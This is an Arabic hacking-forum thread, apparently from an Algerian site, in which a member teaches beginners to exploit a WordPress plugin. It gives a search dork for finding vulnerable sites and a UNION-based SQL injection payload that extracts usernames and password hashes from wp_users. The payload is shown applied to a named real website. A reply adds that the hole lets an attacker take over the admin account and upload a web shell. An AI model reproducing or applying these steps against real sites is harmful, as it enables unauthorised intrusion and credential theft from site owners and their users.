نحن مع غزة
الـرئـيـسـيـة الـمـنـتـدى سـؤال & اجـابـة الـتـبـرع بـالـدم الاسـتـضـافـة هـلال لـيـنـكـس الـقـرآن الـكـريـم Dz-SeC team


التسجيل في المنتدى غير متاح حاليا, اذا كنت ترغب في الحصول على عضوية ارجو مراسلتي على البريد الالكتروني "[email protected]"


مطلوب مشرفين على كامل اقسام المنتدى


أخي / أختي , إن تسجيل عضوية جديدة في منتدى شبكة الجزائر للجميع لا يهدف إلى زيادة الأعضاء مطلقا
فلا خير في عضوية عدد مشاركاتها صفرا فنحن نرفض يوميا الكثير من العضويات المشكوك في أمرها
سواء كان هدفها الإعلانات الغير شرعية أو تخريب الموضوعات الخ , كل هذا حتى يبقى المنتدى
ساحة جادة عطرة تجود بالخير لكل زوارها وأعضائها
وصدقة جارية لكل من يشارك في كتابة معلومة تفيد غيره سوف يشكر الله عليها وهو في جوف الأرض ...

لذلك نطلب منك التسجيل بل ونلح عليك إن كان هدفك هو أن تصنع صدقة جارية لا تنقطع إلى يوم الدين بمساعدة إخوانك في نشر الخير .

للتسجيل اضغط هنا وأملأ البينات المطلوبة بشكل صحيح ومن ثم انتظر حتى نقوم بتفعيل حسابك وابدأ رحلتك في صناعة صدقة جارية .

وتذكر قول سيد الخلق " إذا مات ابن آدم انقطع عمله إلا من ثلاث صدقة جارية أو علم ينتفع به أو ولدٍ صالح يدعو له "

   

[ مـنتدى حمايه المواقع والسيرفرات | Hacking Site's & Servers ] حمايه وأختراق المواقع والسيرفرات باحدت الطرق والادوات ..

إضافة رد
 
أدوات الموضوع انواع عرض الموضوع
قديم 15/12/2010, 08:39   المشاركة رقم: 1
المعلومات
الكاتب:
 Mr norvi  
اللقب:
عضــــو جديــــد
الصورة الرمزية
 
الصورة الرمزية Mr norvi

البيانات
التسجيل : Jun 2010
العضوية : 294
الاهتمامات : hackiiiiiiing
الإقامة : algeria
المواضيع : 18
الردود : 53
المجموع : 71
بمعدل : 0.01 يوميا
الاختراقات : [ليس لدي حساب]
مجتمعنا : []
الصنف : Not Hacker
آخر تواجد : 28/03/2013/16:28
سبب الغياب : حاظر
معدل التقييم: 16
نقاط التقييم: 10
Mr norvi is on a distinguished road
شكراً: 9
تم شكره 20 مرة في 17 مشاركة

 Algeria


الإتصالات
الحالة:
Mr norvi غير متواجد حالياً
وسائل الإتصال:

Talking شرح ثغره من ثغرات Wordpress

أهلا بكم جميعا يــآ أعضاء قراصنة الجزائر

ان شاء الله الجميع بخير

رآآح أشرح ثغره wORDPRESS للمبتدئين

أولا رآبط الثغره

كود PHP:
http://www.exploit-db.com/exploits/10535/ 
الأن نــأتي الى كيفية استغلالها لان الكثير لا يعرف كيفية استغلال الثغرات او بالاحرى قرائتها طبعا يجب على مخترق المواقع ان يتعلم الأساسيات في الأخترااق بعد ذلك يمكنه ان يفهم جميع أشكال الأستغلالات

المهم هذا دوورك البحث

كود PHP:
inurl:maps/results.php?id
و هذا الأستغلال

كود PHP:
/maps/results.php?id=-9999+union+select+1,concat_ws(0x3a,user_login,user_pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+wp_users 
اوكي نأخذ موقع على سبيل المثال

كود PHP:
http://www.canyonchasers.net 
تقووم بأضافة الأستغلال مو الموقع ليصبح هكذا

كود PHP:
http://www.canyonchasers.net//maps/results.php?id=-9999+union+select+1,concat_ws%280x3a,user_login,user_pass%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+wp_users 
في الاخير أود ان أشير الى جميع الأعضاء أن يحترفوو حقن قواعد البيانات و حتى فحص السكريبتات الخخ

و ان شاء الله رآآح نتيجه جيدة و رآآح تتعلموو أشياء مفيدة جدا

تحيــآتي ////



آخر مواضيع » Mr norvi

عرض البوم صور Mr norvi   رد مع اقتباس
الأعضاء الذين قالوا شكراً لـ Mr norvi على المشاركة المفيدة:
ViRuS_Ra3cH (15/12/2010)
قديم 15/12/2010, 14:38   المشاركة رقم: 2
المعلومات
الكاتب:
 hacker almooot  
اللقب:
.: مشرف قسم اختراق الاجهزة :.

الإتصالات
الحالة:
hacker almooot غير متواجد حالياً
وسائل الإتصال:

شكر اخي بوركت

عرض البوم صور hacker almooot   رد مع اقتباس
قديم 15/12/2010, 18:23   المشاركة رقم: 3
المعلومات
الكاتب:
 SaMo_Dz  
اللقب:
عضــــو جديــــد

الإتصالات
الحالة:
SaMo_Dz غير متواجد حالياً
وسائل الإتصال:

****ااااااا

عرض البوم صور SaMo_Dz   رد مع اقتباس
قديم 15/12/2010, 22:22   المشاركة رقم: 4
المعلومات
الكاتب:
 ApOcalYpse  
اللقب:

الإتصالات
الحالة:
ApOcalYpse غير متواجد حالياً
وسائل الإتصال:

الثغرة ليست موجودة في سكربت الورد برس بل في اضافة SEO التي تقوم بانشاء site map
هذي الثغرة خطيرة و بتفكير بسيط يمكن الحصول على حساب مدير مدونة و رفع الشل

عرض البوم صور ApOcalYpse   رد مع اقتباس
قديم 16/12/2010, 08:16   المشاركة رقم: 5
المعلومات
الكاتب:
  MdMn HaCk3r  
اللقب:
.: المدير السابق للمنتدى :.

الإتصالات
الحالة:
MdMn HaCk3r غير متواجد حالياً
وسائل الإتصال:

بارك الله فيك اخي
تحيتي لك

عرض البوم صور MdMn HaCk3r   رد مع اقتباس
قديم 16/12/2010, 12:22   المشاركة رقم: 6
المعلومات
الكاتب:
 raouf160  
اللقب:
Is|sec TeamWork

الإتصالات
الحالة:
raouf160 غير متواجد حالياً
وسائل الإتصال:

بارك الله فيك اخي

عرض البوم صور raouf160   رد مع اقتباس
إضافة رد

مواقع النشر (المفضلة)


حالياً الأعضاء النشيطين الذين يشاهدون هذا الموضوع : 1 (0 عضو و 1 ضيف)
 

(أظهر الكل الأعضاء الذين قاموا بمشاهدة هذا الموضوع : 70
(w@!l) , 00X , ahmedabc1 , ak27 , aminox dz , ApOcalYpse , belo007 , Black-ID , BlackHunter.Dz , Bleard , الشبح المرح , Dr-H4N1 , Dr.HaCkEr , Dr.Pc , Dr.VaMpIrE , DZ1.618 , eXc3lLenCe , ExPLo!T_Dz , fouad , Giipsy , HACER DZ , Hack Mostafa , hacker almooot , Hacker.Martin , Hacker_12 , hardTARGET1234 , Hidden Pain , HmAnA07 , ilyas0206=DZ , KaABoO HAcKeR , kaash , laki21 , maspix , MdMn HaCk3r , mekhanter , Microsoft-Dz , mo3eth , Mr norvi , MR!HACKER , Mr.3Jr4M , Mr.Filter , Mr.hisoka , Mr.L4iVe , over-x , pain96 , prosk , psyico , raouf160 , rowane , salem k , samie , SaMo_Dz , sanfour25 , Silencer Sense , skully , smoker , stallin , tarek , tete23232002 , tonsimca , TRIDZ , ucfcool , ViRuS_Ra3cH , wald-driouch , walid200 , wDw400 , xConsoLe , xSL0mx , X_AviaTique_X , zizou dika
أدوات الموضوع
انواع عرض الموضوع

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

كود [IMG] متاحة
كود HTML معطلة

الانتقال السريع

المواضيع المتشابهه
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
صدور التحديث 3.0.4 لـ WordPress لترقيع ثغرة خطيرة ADMINISTRATOR [ منتدى اخبــــار الشبكـــة] 0 30/12/2010 14:29
ثغره 0Day تمكنك من تلغيم صوتيات RealPlayer ExPLo!T_Dz [ مـنتدى حمايه الاجهزة | Hacking Pc ] 4 26/09/2010 15:19
طريقة اكتشاف ثغرات الفايل انكلود + ثغرات xss وفحص ملفات php WOLF_DZ [ مـنتدى حمايه المواقع والسيرفرات | Hacking Site's & Servers ] 2 18/09/2010 23:24
WordPress Remote File upload Vulnerability ViRuS_Ra3cH [ منتدى الثغرات & أكتشافات الاعضاء ] 8 29/07/2010 16:25
Vulnerabilities in Cimy Counter for WordPress ViRuS_Ra3cH [ منتدى الثغرات & أكتشافات الاعضاء ] 1 29/07/2010 16:11

الساعة معتمدة بتوقيت جرينتش +1 . الساعة الآن : 00:05.
Copy Right Des 2010 - 2014 To is|sec Organization, Des By  yasMouh 
Powered By vBulletin Special Edition, Secured By Dz-SeC team
Support by Dz-SeC team




RSS RSS 2.0 XML MAP HTML



 
 
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115